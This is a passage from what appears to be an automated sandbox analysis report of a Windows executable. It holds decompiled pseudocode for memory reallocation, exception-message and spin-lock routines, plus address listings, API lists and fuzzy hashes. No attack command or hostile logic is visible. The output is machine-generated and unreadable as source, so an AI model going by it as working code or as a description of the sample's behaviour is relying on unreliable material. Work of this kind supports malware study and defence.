						__eflags = _t166 & 0x00000003;
						if((_t166 & 0x00000003) == 0) {
							_push(_t145);
							_push(__eax);
							_push(__edi);
							_push(_t225);
							_t244 = _t243 + 0xffffffe0;
							_t218 = __edx;
							_t202 = __eax;
							_t69 =  *(__eax - 4);
							_t148 = (0xfffffff0 & _t69) - 0x14;
							if(0xfffffff0 >= __edx) {
								__eflags = __edx - _t148 >> 1;
								if(__edx < _t148 >> 1) {
									_t150 = E00403EE8(__edx);
									__eflags = _t150;
									if(_t150 != 0) {
										__eflags = _t218 - 0x40a2c;
										if(_t218 > 0x40a2c) {
											_t78 = _t202 - 0x10;
											__eflags = _t78;
											 *((intOrPtr*)(_t78 + 8)) = _t218;
										}
										E00403AA4(_t202, _t218, _t150);
										E0040426C(_t202, _t202, _t225);
									}
								} else {
									_t150 = __eax;
									 *((intOrPtr*)(__eax - 0x10 + 8)) = __edx;
								}
							} else {
								if(0xfffffff0 <= __edx) {
									_t227 = __edx;
								} else {
									_t227 = 0xbadb9d;
								}
								 *_t244 = _t202 - 0x10 + (_t69 & 0xfffffff0);
								VirtualQuery( *(_t244 + 8), _t244 + 8, 0x1c);
								if( *((intOrPtr*)(_t244 + 0x14)) != 0x10000) {
									L12:
									_t150 = E00403EE8(_t227);
									__eflags = _t150;
									if(_t150 != 0) {
										__eflags = _t227 - 0x40a2c;
										if(_t227 > 0x40a2c) {
											_t93 = _t150 - 0x10;
											__eflags = _t93;
											 *((intOrPtr*)(_t93 + 8)) = _t218;
										}
										E00403A74(_t202,  *((intOrPtr*)(_t202 - 0x10 + 8)), _t150);
										E0040426C(_t202, _t202, _t227);
									}
								} else {
									 *(_t244 + 0x10) =  *(_t244 + 0x10) & 0xffff0000;
									_t94 =  *(_t244 + 0x10);
									if(_t218 - _t148 >= _t94) {
										goto L12;
									} else {
										_t152 = _t227 - _t148 + 0x00010000 - 0x00000001 & 0xffff0000;
										if(_t94 < _t152) {
											_t152 = _t94;
										}
										if(VirtualAlloc( *(_t244 + 0xc), _t152, 0x2000, 4) == 0 || VirtualAlloc( *(_t244 + 0xc), _t152, 0x1000, 4) == 0) {
											goto L12;
										} else {
											_t100 = _t202 - 0x10;
											 *((intOrPtr*)(_t100 + 8)) = _t218;
											 *(_t100 + 0xc) = _t152 +  *(_t100 + 0xc) | 0x00000008;
											_t150 = _t202;
										}
									}
								}
							}
							return _t150;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t170 = _t166 & 0xfffffff0;
						_push(__edi);
						_t205 = _t170 + __eax;
						_t171 = _t170 - 4;
						_t156 = _t166 & 0x0000000f;
						__eflags = __edx - _t171;
						_push(_t225);
						if(__edx > _t171) {
							_t102 =  *(_t205 - 4);
							__eflags = _t102 & 0x00000001;
							if((_t102 & 0x00000001) == 0) {
								L75:
								asm("adc edi, 0xffffffff");
								_t228 = ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176;
								_t207 = _t171;
								_t109 = E00403EE8(((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176);
								_t192 = _t176;
								__eflags = _t109;
								if(_t109 == 0) {
									goto L73;
								} else {
									__eflags = _t228 - 0x40a2c;
									if(_t228 > 0x40a2c) {
										 *((intOrPtr*)(_t109 - 8)) = _t192;
									}
									_t230 = _t109;
									E00403A74(_t217, _t207, _t109);
									E0040426C(_t217, _t207, _t230);
									return _t230;
								}
							} else {
								_t115 = _t102 & 0xfffffff0;
								_t232 = _t171 + _t115;
								__eflags = __edx - _t232;
								if(__edx > _t232) {
									goto L75;
								} else {
									__eflags =  *0x4bb059;
									if(__eflags == 0) {
										L66:
										__eflags = _t115 - 0xb30;
										if(_t115 >= 0xb30) {
											E00403AC0(_t205);
											_t176 = _t176;
											_t171 = _t171;
										}
										asm("adc edi, 0xffffffff");
										_t123 = (_t176 + ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + 0x000000d3 & 0xffffff00) + 0x30;
										_t195 = _t232 + 4 - _t123;
										__eflags = _t195;
										if(_t195 > 0) {
											 *(_t217 + _t232 - 4) = _t195;
											 *((intOrPtr*)(_t217 - 4 + _t123)) = _t195 + 3;
											_t233 = _t123;
											__eflags = _t195 - 0xb30;
											if(_t195 >= 0xb30) {
												__eflags = _t123 + _t217;
												E00403B00(_t123 + _t217, _t171, _t195);
											}
										} else {
											 *(_t217 + _t232) =  *(_t217 + _t232) & 0xfffffff7;
											_t233 = _t232 + 4;
										}
										_t234 = _t233 | _t156;
										__eflags = _t234;
										 *(_t217 - 4) = _t234;
										 *0x4bbae8 = 0;
										_t109 = _t217;
										L73:
										return _t109;
									} else {
										while(1) {
											asm("lock cmpxchg [0x4bbae8], ah");
											if(__eflags == 0) {
												break;
											}
											asm("pause");
											__eflags =  *0x4bb989;
											if(__eflags != 0) {
												continue;
											} else {
												Sleep(0);
												_t176 = _t176;
												_t171 = _t171;
												asm("lock cmpxchg [0x4bbae8], ah");
												if(__eflags != 0) {
													Sleep(0xa);
													_t176 = _t176;
													_t171 = _t171;
													continue;
												}
											}
											break;
										}
										_t156 = 0x0000000f &  *(_t217 - 4);
										_t129 =  *(_t205 - 4);
										__eflags = _t129 & 0x00000001;
										if((_t129 & 0x00000001) == 0) {
											L74:
											 *0x4bbae8 = 0;
											goto L75;
										} else {
											_t115 = _t129 & 0xfffffff0;
											_t232 = _t171 + _t115;
											__eflags = _t176 - _t232;
											if(_t176 > _t232) {
												goto L74;
											} else {
												goto L66;
											}
										}
									}
								}
							}
						} else {
							__eflags = __edx + __edx - _t171;
							if(__edx + __edx < _t171) {
								__eflags = __edx - 0xb2c;
								if(__edx >= 0xb2c) {
									L41:
									_t32 = _t176 + 0xd3; // 0xbff
									_t238 = (_t32 & 0xffffff00) + 0x30;
									_t174 = _t171 + 4 - _t238;
									__eflags =  *0x4bb059;
									if(__eflags != 0) {
										while(1) {
											asm("lock cmpxchg [0x4bbae8], ah");
											if(__eflags == 0) {
												break;
											}
											asm("pause");
											__eflags =  *0x4bb989;
											if(__eflags != 0) {
												continue;
											} else {
												Sleep(0);
												_t174 = _t174;
												asm("lock cmpxchg [0x4bbae8], ah");
												if(__eflags != 0) {
													Sleep(0xa);
													_t174 = _t174;
													continue;
												}
											}
											break;
										}
										_t156 = 0x0000000f &  *(_t217 - 4);
										__eflags = 0xf;
									}
									 *(_t217 - 4) = _t156 | _t238;
									_t161 = _t174;
									_t196 =  *(_t205 - 4);
									__eflags = _t196 & 0x00000001;
									if((_t196 & 0x00000001) != 0) {
										_t131 = _t205;
										_t197 = _t196 & 0xfffffff0;
										_t161 = _t161 + _t197;
										_t205 = _t205 + _t197;
										__eflags = _t197 - 0xb30;
										if(_t197 >= 0xb30) {
											E00403AC0(_t131);
										}
									} else {
										 *(_t205 - 4) = _t196 | 0x00000008;
									}
									 *((intOrPtr*)(_t205 - 8)) = _t161;
									 *((intOrPtr*)(_t217 + _t238 - 4)) = _t161 + 3;
									__eflags = _t161 - 0xb30;
									if(_t161 >= 0xb30) {
										E00403B00(_t217 + _t238, _t174, _t161);
									}
									 *0x4bbae8 = 0;
									return _t217;
								} else {
									__eflags = __edx - 0x2cc;
									if(__edx < 0x2cc) {
										_t213 = __edx;
										_t140 = E00403EE8(__edx);
										__eflags = _t140;
										if(_t140 != 0) {
											_t241 = _t140;
											E00403AA4(_t217, _t213, _t140);
											E0040426C(_t217, _t213, _t241);
											_t140 = _t241;
										}
										return _t140;
									} else {
										_t176 = 0xb2c;
										__eflags = _t171 - 0xb2c;
										if(_t171 <= 0xb2c) {
											goto L37;
										} else {
											goto L41;
										}
									}
								}
							} else {
								L37:
								return _t66;
							}
						}
					}
				} else {
					__ebx =  *__ecx;
					__ecx =  *(__ebx + 2) & 0x0000ffff;
					__ecx = ( *(__ebx + 2) & 0x0000ffff) - 4;
					__eflags = __ecx - __edx;
					if(__ecx < __edx) {
						__ecx = __ecx + __ecx + 0x20;
						_push(__edi);
						__edi = __edx;
						__eax = 0;
						__ecx = __ecx - __edx;
						asm("adc eax, 0xffffffff");
						__eax = 0 & __ecx;
						__eax = (0 & __ecx) + __edx;
						__eax = E00403EE8((0 & __ecx) + __edx);
						__eflags = __eax;
						if(__eax != 0) {
							__eflags = __edi - 0x40a2c;
							if(__edi > 0x40a2c) {
								 *(__eax - 8) = __edi;
							}
							 *(__ebx + 2) & 0x0000ffff = ( *(__ebx + 2) & 0x0000ffff) - 4;
							__eflags = ( *(__ebx + 2) & 0x0000ffff) - 4;
							__edx = __eax;
							__edi = __eax;
							 *((intOrPtr*)(__ebx + 0x1c))() = E0040426C(__esi, __edi, __ebp);
							__eax = __edi;
						}
						_pop(__edi);
						_pop(__esi);
						_pop(__ebx);
						return __eax;
					} else {
						__ebx = 0x40 + __edx * 4;
						__eflags = 0x40 + __edx * 4 - __ecx;
						if(0x40 + __edx * 4 < __ecx) {
							__ebx = __edx;
							__eax = __edx;
							__eax = E00403EE8(__edx);
							__eflags = __eax;
							if(__eax != 0) {
								__ecx = __ebx;
								__edx = __eax;
								__ebx = __eax;
								__esi = E0040426C(__esi, __edi, __ebp);
								__eax = __ebx;
							}
							_pop(__esi);
							_pop(__ebx);
							return __eax;
						} else {
							_pop(__esi);
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}












































                                                                    0x00404464
                                                                    0x00404464
                                                                    0x00404464
                                                                    0x0040446c
                                                                    0x0040446e
                                                                    0x004044fc
                                                                    0x004044ff
                                                                    0x0040476c
                                                                    0x0040476d
                                                                    0x0040476e
                                                                    0x00404771
                                                                    0x00403d9c
                                                                    0x00403d9d
                                                                    0x00403d9e
                                                                    0x00403d9f
                                                                    0x00403da0
                                                                    0x00403da3
                                                                    0x00403da5
                                                                    0x00403dac
                                                                    0x00403db5
                                                                    0x00403dba
                                                                    0x00403ea1
                                                                    0x00403ea3
                                                                    0x00403eb6
                                                                    0x00403eb8
                                                                    0x00403eba
                                                                    0x00403ebc
                                                                    0x00403ec2
                                                                    0x00403ec6
                                                                    0x00403ec6
                                                                    0x00403ec9
                                                                    0x00403ec9
                                                                    0x00403ed2
                                                                    0x00403ed9
                                                                    0x00403ed9
                                                                    0x00403ea5
                                                                    0x00403ea5
                                                                    0x00403eaa
                                                                    0x00403eaa
                                                                    0x00403dc0
                                                                    0x00403dc9
                                                                    0x00403dcf
                                                                    0x00403dcb
                                                                    0x00403dcb
                                                                    0x00403dcb
                                                                    0x00403ddb
                                                                    0x00403dea
                                                                    0x00403df7
                                                                    0x00403e67
                                                                    0x00403e6e
                                                                    0x00403e70
                                                                    0x00403e72
                                                                    0x00403e74
                                                                    0x00403e7a
                                                                    0x00403e7e
                                                                    0x00403e7e
                                                                    0x00403e81
                                                                    0x00403e81
                                                                    0x00403e91
                                                                    0x00403e98
                                                                    0x00403e98
                                                                    0x00403df9
                                                                    0x00403df9
                                                                    0x00403e05
                                                                    0x00403e0b
                                                                    0x00000000
                                                                    0x00403e0d
                                                                    0x00403e1e
                                                                    0x00403e22
                                                                    0x00403e24
                                                                    0x00403e24
                                                                    0x00403e3a
                                                                    0x00000000
                                                                    0x00403e52
                                                                    0x00403e54
                                                                    0x00403e57
                                                                    0x00403e60
                                                                    0x00403e63
                                                                    0x00403e63
                                                                    0x00403e3a
                                                                    0x00403e0b
                                                                    0x00403df7
                                                                    0x00403ee7
                                                                    0x00404777
                                                                    0x00404777
                                                                    0x00404779
                                                                    0x00404779
                                                                    0x00404505
                                                                    0x00404507
                                                                    0x0040450a
                                                                    0x0040450b
                                                                    0x0040450e
                                                                    0x00404511
                                                                    0x00404514
                                                                    0x00404516
                                                                    0x00404517
                                                                    0x0040462c
                                                                    0x0040462f
                                                                    0x00404631
                                                                    0x00404724
                                                                    0x0040472f
                                                                    0x00404736
                                                                    0x00404738
                                                                    0x0040473b
                                                                    0x00404740
                                                                    0x00404741
                                                                    0x00404743
                                                                    0x00000000
                                                                    0x00404745
                                                                    0x00404745
                                                                    0x0040474b
                                                                    0x0040474d
                                                                    0x0040474d
                                                                    0x00404750
                                                                    0x00404758
                                                                    0x0040475f
                                                                    0x0040476a
                                                                    0x0040476a
                                                                    0x00404637
                                                                    0x00404637
                                                                    0x0040463a
                                                                    0x0040463d
                                                                    0x0040463f
                                                                    0x00000000
                                                                    0x00404645
                                                                    0x00404645
                                                                    0x0040464c
                                                                    0x004046a9
                                                                    0x004046a9
                                                                    0x004046ae
                                                                    0x004046b4
                                                                    0x004046b9
                                                                    0x004046ba
                                                                    0x004046ba
                                                                    0x004046c6
                                                                    0x004046d7
                                                                    0x004046dd
                                                                    0x004046dd
                                                                    0x004046df
                                                                    0x004046ec
                                                                    0x004046f3
                                                                    0x004046f7
                                                                    0x004046f9
                                                                    0x004046ff
                                                                    0x00404701
                                                                    0x00404703
                                                                    0x00404703
                                                                    0x004046e1
                                                                    0x004046e1
                                                                    0x004046e5
                                                                    0x004046e5
                                                                    0x00404708
                                                                    0x00404708
                                                                    0x0040470a
                                                                    0x0040470d
                                                                    0x00404714
                                                                    0x00404716
                                                                    0x0040471a
                                                                    0x0040464e
                                                                    0x0040464e
                                                                    0x00404653
                                                                    0x0040465b
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040465d
                                                                    0x0040465f
                                                                    0x00404666
                                                                    0x00000000
                                                                    0x00404668
                                                                    0x0040466c
                                                                    0x00404671
                                                                    0x00404672
                                                                    0x00404678
                                                                    0x00404680
                                                                    0x00404686
                                                                    0x0040468b
                                                                    0x0040468c
                                                                    0x00000000
                                                                    0x0040468c
                                                                    0x00404680
                                                                    0x00000000
                                                                    0x00404666
                                                                    0x00404695
                                                                    0x00404698
                                                                    0x0040469b
                                                                    0x0040469d
                                                                    0x0040471d
                                                                    0x0040471d
                                                                    0x00000000
                                                                    0x0040469f
                                                                    0x0040469f
                                                                    0x004046a2
                                                                    0x004046a5
                                                                    0x004046a7
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004046a7
                                                                    0x0040469d
                                                                    0x0040464c
                                                                    0x0040463f
                                                                    0x0040451d
                                                                    0x00404520
                                                                    0x00404522
                                                                    0x0040452c
                                                                    0x00404532
                                                                    0x00404549
                                                                    0x00404549
                                                                    0x00404555
                                                                    0x0040455b
                                                                    0x0040455d
                                                                    0x00404564
                                                                    0x00404566
                                                                    0x0040456b
                                                                    0x00404573
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404575
                                                                    0x00404577
                                                                    0x0040457e
                                                                    0x00000000
                                                                    0x00404580
                                                                    0x00404583
                                                                    0x00404588
                                                                    0x0040458e
                                                                    0x00404596
                                                                    0x0040459b
                                                                    0x004045a0
                                                                    0x00000000
                                                                    0x004045a0
                                                                    0x00404596
                                                                    0x00000000
                                                                    0x0040457e
                                                                    0x004045a9
                                                                    0x004045a9
                                                                    0x004045a9
                                                                    0x004045ae
                                                                    0x004045b1
                                                                    0x004045b3
                                                                    0x004045b6
                                                                    0x004045b9
                                                                    0x004045c4
                                                                    0x004045c6
                                                                    0x004045c9
                                                                    0x004045cb
                                                                    0x004045cd
                                                                    0x004045d3
                                                                    0x004045d5
                                                                    0x004045d5
                                                                    0x004045bb
                                                                    0x004045be
                                                                    0x004045be
                                                                    0x004045da
                                                                    0x004045e0
                                                                    0x004045e4
                                                                    0x004045ea
                                                                    0x004045f1
                                                                    0x004045f1
                                                                    0x004045f6
                                                                    0x00404603
                                                                    0x00404534
                                                                    0x00404534
                                                                    0x0040453a
                                                                    0x00404604
                                                                    0x00404608
                                                                    0x0040460d
                                                                    0x0040460f
                                                                    0x00404611
                                                                    0x00404619
                                                                    0x00404620
                                                                    0x00404625
                                                                    0x00404625
                                                                    0x0040462b
                                                                    0x00404540
                                                                    0x00404540
                                                                    0x00404545
                                                                    0x00404547
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00404547
                                                                    0x0040453a
                                                                    0x00404524
                                                                    0x00404524
                                                                    0x00404528
                                                                    0x00404528
                                                                    0x00404522
                                                                    0x00404517
                                                                    0x00404474
                                                                    0x00404474
                                                                    0x00404476
                                                                    0x0040447a
                                                                    0x0040447d
                                                                    0x0040447f
                                                                    0x004044b8
                                                                    0x004044bc
                                                                    0x004044bd
                                                                    0x004044bf
                                                                    0x004044c1
                                                                    0x004044c3
                                                                    0x004044c6
                                                                    0x004044c8
                                                                    0x004044ca
                                                                    0x004044cf
                                                                    0x004044d1
                                                                    0x004044d3
                                                                    0x004044d9
                                                                    0x004044db
                                                                    0x004044db
                                                                    0x004044e2
                                                                    0x004044e2
                                                                    0x004044e5
                                                                    0x004044e7
                                                                    0x004044f0
                                                                    0x004044f5
                                                                    0x004044f5
                                                                    0x004044f7
                                                                    0x004044f8
                                                                    0x004044f9
                                                                    0x004044fa
                                                                    0x00404481
                                                                    0x00404481
                                                                    0x00404488
                                                                    0x0040448a
                                                                    0x00404490
                                                                    0x00404492
                                                                    0x00404494
                                                                    0x00404499
                                                                    0x0040449b
                                                                    0x0040449d
                                                                    0x0040449f
                                                                    0x004044a1
                                                                    0x004044ac
                                                                    0x004044b1
                                                                    0x004044b1
                                                                    0x004044b3
                                                                    0x004044b4
                                                                    0x004044b5
                                                                    0x0040448c
                                                                    0x0040448c
                                                                    0x0040448d
                                                                    0x0040448e
                                                                    0x0040448e
                                                                    0x0040448a
                                                                    0x0040447f

                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ec1625ffc2fe51f8c31513aba64e24c59fd6eccf0fed4d7fd9cb209259156b9f
                                                                    • Instruction ID: a6f3f7862a5743fd60f07ae337b35688b7a953487e66f12862dc3ba09d14b1d9
                                                                    • Opcode Fuzzy Hash: ec1625ffc2fe51f8c31513aba64e24c59fd6eccf0fed4d7fd9cb209259156b9f
                                                                    • Instruction Fuzzy Hash: 8CC115A27106000BD714AE7DDD8476AB68A9BC5716F28827FF244EB3D6DB7CCD418388
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0041F7A0, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 131COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 68%
                                                                    			E0041F7A0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				short _v558;
				char _v564;
				intOrPtr _v568;
				char _v572;
				char _v576;
				char _v580;
				intOrPtr _v584;
				char _v588;
				void* _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				intOrPtr _v612;
				char _v616;
				char _v620;
				char _v624;
				void* _v628;
				char _v632;
				void* _t64;
				intOrPtr _t65;
				long _t76;
				intOrPtr _t82;
				intOrPtr _t103;
				intOrPtr _t107;
				intOrPtr _t110;
				intOrPtr _t112;
				intOrPtr _t115;
				intOrPtr _t127;
				void* _t136;
				intOrPtr _t138;
				void* _t141;
				void* _t143;

				_t136 = __edi;
				_t140 = _t141;
				_v632 = 0;
				_v596 = 0;
				_v604 = 0;
				_v600 = 0;
				_v8 = 0;
				_push(_t141);
				_push(0x41f9a6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t141 + 0xfffffd8c;
				_t64 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x14)) - 1;
				_t143 = _t64;
				if(_t143 < 0) {
					_t65 =  *0x4ba798; // 0x40e730
					E0040C9F0(_t65,  &_v8, _t140);
				} else {
					if(_t143 == 0) {
						_t107 =  *0x4ba670; // 0x40e738
						E0040C9F0(_t107,  &_v8, _t140);
					} else {
						if(_t64 == 7) {
							_t110 =  *0x4ba4d0; // 0x40e740
							E0040C9F0(_t110,  &_v8, _t140);
						} else {
							_t112 =  *0x4ba5c8; // 0x40e748
							E0040C9F0(_t112,  &_v8, _t140);
						}
					}
				}
				_t115 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x18));
				VirtualQuery( *( *((intOrPtr*)(_a4 - 4)) + 0xc),  &_v36, 0x1c);
				_t138 = _v36.State;
				if(_t138 == 0x1000 || _t138 == 0x10000) {
					_t76 = GetModuleFileNameW(_v36.AllocationBase,  &_v558, 0x105);
					_t147 = _t76;
					if(_t76 == 0) {
						goto L12;
					} else {
						_v592 =  *( *((intOrPtr*)(_a4 - 4)) + 0xc);
						_v588 = 5;
						E0040858C( &_v600, 0x105,  &_v558);
						E0041A418(_v600, _t115,  &_v596, _t136, _t138, _t147);
						_v584 = _v596;
						_v580 = 0x11;
						_v576 = _v8;
						_v572 = 0x11;
						_v568 = _t115;
						_v564 = 5;
						_push( &_v592);
						_t103 =  *0x4ba6e0; // 0x40e810
						E0040C9F0(_t103,  &_v604, _t140, 3);
						E0041F2A0(_t115, _v604, 1, _t136, _t138);
					}
				} else {
					L12:
					_v628 =  *( *((intOrPtr*)(_a4 - 4)) + 0xc);
					_v624 = 5;
					_v620 = _v8;
					_v616 = 0x11;
					_v612 = _t115;
					_v608 = 5;
					_push( &_v628);
					_t82 =  *0x4ba67c; // 0x40e6d8
					E0040C9F0(_t82,  &_v632, _t140, 2);
					E0041F2A0(_t115, _v632, 1, _t136, _t138);
				}
				_pop(_t127);
				 *[fs:eax] = _t127;
				_push(0x41f9ad);
				E00407A20( &_v632);
				E00407A80( &_v604, 3);
				return E00407A20( &_v8);
			}






































                                                                    0x0041f7a0
                                                                    0x0041f7a1
                                                                    0x0041f7ad
                                                                    0x0041f7b3
                                                                    0x0041f7b9
                                                                    0x0041f7bf
                                                                    0x0041f7c5
                                                                    0x0041f7ca
                                                                    0x0041f7cb
                                                                    0x0041f7d0
                                                                    0x0041f7d3
                                                                    0x0041f7df
                                                                    0x0041f7df
                                                                    0x0041f7e2
                                                                    0x0041f7f0
                                                                    0x0041f7f5
                                                                    0x0041f7e4
                                                                    0x0041f7e4
                                                                    0x0041f7ff
                                                                    0x0041f804
                                                                    0x0041f7e6
                                                                    0x0041f7e9
                                                                    0x0041f80e
                                                                    0x0041f813
                                                                    0x0041f7eb
                                                                    0x0041f81d
                                                                    0x0041f822
                                                                    0x0041f822
                                                                    0x0041f7e9
                                                                    0x0041f7e4
                                                                    0x0041f82d
                                                                    0x0041f840
                                                                    0x0041f845
                                                                    0x0041f84e
                                                                    0x0041f86c
                                                                    0x0041f871
                                                                    0x0041f873
                                                                    0x00000000
                                                                    0x0041f879
                                                                    0x0041f882
                                                                    0x0041f888
                                                                    0x0041f8a0
                                                                    0x0041f8b1
                                                                    0x0041f8bc
                                                                    0x0041f8c2
                                                                    0x0041f8cc
                                                                    0x0041f8d2
                                                                    0x0041f8d9
                                                                    0x0041f8df
                                                                    0x0041f8ec
                                                                    0x0041f8f5
                                                                    0x0041f8fa
                                                                    0x0041f90c
                                                                    0x0041f911
                                                                    0x0041f915
                                                                    0x0041f915
                                                                    0x0041f91e
                                                                    0x0041f924
                                                                    0x0041f92e
                                                                    0x0041f934
                                                                    0x0041f93b
                                                                    0x0041f941
                                                                    0x0041f94e
                                                                    0x0041f957
                                                                    0x0041f95c
                                                                    0x0041f96e
                                                                    0x0041f973
                                                                    0x0041f977
                                                                    0x0041f97a
                                                                    0x0041f97d
                                                                    0x0041f988
                                                                    0x0041f998
                                                                    0x0041f9a5

                                                                    APIs
                                                                    • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F9A6), ref: 0041F840
                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0041F9A6), ref: 0041F86C
                                                                      • Part of subcall function 0040C9F0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 0040CA35
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000000C.00000002.337211101.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 0000000C.00000002.337202126.0000000000400000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337302256.00000000004B7000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337318415.00000000004C0000.00000004.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337329206.00000000004C4000.00000002.00020000.sdmp Download File
                                                                    • Associated: 0000000C.00000002.337338314.00000000004C6000.00000002.00020000.sdmp Download File
                                                                    Similarity
                                                                    • API ID: FileLoadModuleNameQueryStringVirtual
                                                                    • String ID: 0@$8@$@@$H@
                                                                    • API String ID: 902310565-4161625419
                                                                    • Opcode ID: 2bcb5d97eafe9ae16bdb5e5d20f221eb3d58e794d65a866e62d276be447e8c2a
                                                                    • Instruction ID: bbc3c026f35d1d6bea3ad9012fddeafd4c483e803022796d8e8ef386e34d3195
                                                                    • Opcode Fuzzy Hash: 2bcb5d97eafe9ae16bdb5e5d20f221eb3d58e794d65a866e62d276be447e8c2a
                                                                    • Instruction Fuzzy Hash: 69511874A04258DFCB10EF69CC89BCDB7F4AB48304F0042E6A808A7351D778AE85CF59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00406688, Relevance: 10.6, APIs: 7, Instructions: 130threadCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 88%
                                                                    			E00406688(signed char* __eax, void* __edx, void* __eflags) {
				void* _t49;
				signed char _t56;
				intOrPtr _t57;
				signed char _t59;
				void* _t70;
				signed char* _t71;
				intOrPtr _t72;
				signed char* _t73;

				_t70 = __edx;
				_t71 = __eax;
				_t72 =  *((intOrPtr*)(__eax + 0x10));
				while(1) {
					L1:
					 *_t73 = E00406B30(_t71);
					if( *_t73 != 0 || _t70 == 0) {
						break;
					}
					_t73[1] = 0;
					if(_t72 <= 0) {
						while(1) {
							L17:
							_t56 =  *_t71;
							if(_t56 == 0) {
								goto L1;
							}
							asm("lock cmpxchg [esi], edx");
							if(_t56 != _t56) {
								continue;
							} else {
								goto L19;
							}
							do {
								L19:
								_t73[4] = GetTickCount();
								E0040688C(_t71);
								_t57 =  *0x4bb8f8; // 0x4b9284
								 *((intOrPtr*)(_t57 + 0x10))();
								 *_t73 = 0 == 0;
								if(_t70 != 0xffffffff) {
									_t73[8] = GetTickCount();
									if(_t70 <= _t73[8] - _t73[4]) {
										_t70 = 0;
									} else {
										_t70 = _t70 - _t73[8] - _t73[4];
									}
								}
								if( *_t73 == 0) {
									do {
										asm("lock cmpxchg [esi], edx");
									} while ( *_t71 !=  *_t71);
									_t73[1] = 1;
								} else {
									while(1) {
										_t59 =  *_t71;
										if((_t59 & 0x00000001) != 0) {
											goto L29;
										}
										asm("lock cmpxchg [esi], edx");
										if(_t59 != _t59) {
											continue;
										}
										_t73[1] = 1;
										goto L29;
									}
								}
								L29:
							} while (_t73[1] == 0);
							if( *_t73 != 0) {
								_t71[8] = GetCurrentThreadId();
								_t71[4] = 1;
							}
							goto L32;
						}
						continue;
					}
					_t73[4] = GetTickCount();
					_t73[0xc] = 0;
					if(_t72 <= 0) {
						L13:
						if(_t70 == 0xffffffff) {
							goto L17;
						}
						_t73[8] = GetTickCount();
						_t49 = _t73[8] - _t73[4];
						if(_t70 > _t49) {
							_t70 = _t70 - _t49;
							goto L17;
						}
						 *_t73 = 0;
						break;
					}
					L5:
					L5:
					if(_t70 == 0xffffffff || _t70 > GetTickCount() - _t73[4]) {
						goto L8;
					} else {
						 *_t73 = 0;
					}
					break;
					L8:
					if( *_t71 > 1) {
						goto L13;
					}
					if( *_t71 != 0) {
						L12:
						E00406368( &(_t73[0xc]));
						_t72 = _t72 - 1;
						if(_t72 > 0) {
							goto L5;
						}
						goto L13;
					}
					asm("lock cmpxchg [esi], edx");
					if(0 != 0) {
						goto L12;
					}
					_t71[8] = GetCurrentThreadId();
					_t71[4] = 1;
					 *_t73 = 1;
					break;
				}
				L32:
				return  *_t73 & 0x000000ff;
			}











                                                                    0x0040668f
                                                                    0x00406691
                                                                    0x00406693
                                                                    0x00406696
                                                                    0x00406696
                                                                    0x0040669d
                                                                    0x004066a4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004066b2
                                                                    0x004066b9
                                                                    0x00406751
                                                                    0x00406751
                                                                    0x00406751
                                                                    0x00406755
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406760
                                                                    0x00406766
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406768
                                                                    0x00406768
                                                                    0x0040676d
                                                                    0x00406773
                                                                    0x0040677a
                                                                    0x00406784
                                                                    0x00406789
                                                                    0x00406790
                                                                    0x00406797
                                                                    0x004067a5
                                                                    0x004067b3
                                                                    0x004067a7
                                                                    0x004067af
                                                                    0x004067af
                                                                    0x004067a5
                                                                    0x004067b9
                                                                    0x004067db
                                                                    0x004067e4
                                                                    0x004067e8
                                                                    0x004067ec
                                                                    0x00000000
                                                                    0x004067bb
                                                                    0x004067bb
                                                                    0x004067c0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004067cc
                                                                    0x004067d2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004067d4
                                                                    0x00000000
                                                                    0x004067d4
                                                                    0x004067bb
                                                                    0x004067f1
                                                                    0x004067f1
                                                                    0x00406800
                                                                    0x00406807
                                                                    0x0040680a
                                                                    0x0040680a
